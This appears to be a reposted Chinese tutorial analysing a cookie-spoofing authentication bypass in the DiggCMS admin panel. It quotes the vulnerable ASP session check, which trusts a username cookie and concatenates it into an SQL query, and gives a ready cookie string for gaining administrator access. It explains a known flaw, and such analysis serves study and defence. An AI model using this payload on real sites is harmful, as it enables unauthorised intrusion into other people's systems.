文章详情

  • 游戏榜单
  • 软件榜单
关闭导航
热搜榜
热门下载
热门标签
php爱好者> php文档>Cookies欺骗漏洞分析(图文)

Cookies欺骗漏洞分析(图文)

时间:2010-11-22  来源:m4r10

  在只对用户做Cookies验证的系统中,通过修改Cookies的内容来得到相应的用户权限登录。初级的可以修改Cookies的过期时间,实现永久登陆的目的。Cookies欺骗在入侵中经常用到,通过修改Cookies的内容来得到相应的用户权限登录,从而达到入侵的目的。

 

  到底什么是Cookies,它有什么作用呢?Cookies是一种能够让网站服务器把少量数据储存到客户端的硬盘或内存,或是从客户端的硬盘读取数据的一种技术。Cookies是当你浏览某网站时,由Web服务器置于你硬盘上的一个非常小的文本文件,它可以记录你的用户ID、密码、浏览过的网页、停留的时间等信息。

Cookies欺骗实例:
以Diggcms为例我们看代码:
后台登陆验证是通过session.asp实现的,看代码

set conn=linkDB(datapath_admin)  if request.Cookies("username")="" then  '如果获取的Cookies中username为空就跳转到login.asp  response.Redirect("login.asp")  response.End()  end if   Call limits(2)   '管理员权限  Sub limits(pnum)  set ris=conn.execute("select UserAccountStatus,UserRoleID from tc_user where UserName='"&request.Cookies("username")&"' and UserRoleID in(2,3)")  '查询Cookies中的username和UserRoleID在数据库中是否有记录  if ris.eof then  call ShowWin("<br><br><center>没有授权</center>")  response.End()  else  if ris("UserAccountStatus")=0 then  'UserAccountStatus为0则为没激活用户  response.Write "没有激活"  response.End()  end if  if pnum=3 then  if ris("UserRoleID")<>3 then  ' response.Write "没有授权"  call ShowWin("<br><br><center>没有授权</center>")  response.End()  end if  end if   end if  ris.close  set ris=Nothing End sub   

因此我们只要修改COOKIES中的username和UserRoleID以及UserAccountStatus即可。
打开我们可以修改Cookies的浏览器,之后再Cookies后面添加:

 

;UserAccountStatus=1; username=admin; UserRoleID=3;  

这样我们再刷新页面打开index.asp 就直接进入了后台。
 

 

标签分类:

相关阅读 更多 +
排行榜 更多 +
泡龙大闯关安卓版

泡龙大闯关安卓版

冒险解谜 下载
割草派对安卓版

割草派对安卓版

飞行射击 下载
堡垒攻防战安卓版

堡垒攻防战安卓版

飞行射击 下载